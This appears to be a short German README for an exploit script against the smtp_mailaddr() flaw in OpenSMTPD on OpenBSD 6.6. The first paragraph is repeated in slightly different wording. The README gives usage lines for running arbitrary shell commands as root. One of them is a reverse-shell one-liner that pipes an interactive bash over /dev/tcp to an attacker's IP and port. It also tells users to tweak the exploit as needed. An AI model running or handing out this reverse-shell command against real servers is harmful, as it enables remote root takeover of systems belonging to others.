
Diese Sicherheitslücke existiert in der Funktion "smtp_mailaddr()" des Mailservers OpenSMTPD von OpenBSD und betrifft OpenBSD Version 6.6. Dies ermöglicht es einem Angreifer, beliebige Shell-Befehle wie "sleep 66" als Root-Benutzer auszuführen.
Diese Sicherheitslücke existiert in der Funktion „smtp_mailaddr()“ des OpenBSD-Mailservers OpenSMTPD und betrifft OpenBSD Version 6.6. Sie ermöglicht es einem Angreifer, beliebige Shell-Befehle wie „sleep 66“ als root-Benutzer auszuführen.
python3 getShell.py <ZielIp> <ZielPort> <Befehl>
Wenn Sie eine Reverse Shell benötigen, führen Sie es wie folgt aus:
python3 getShell.py <ZielIp> <ZielPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'
Ändern Sie einige Dinge in diesem Exploit wie RCPT to und etwas (falls nötig)
Siehe diesen Artikel für eine klarere Erklärung:
https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/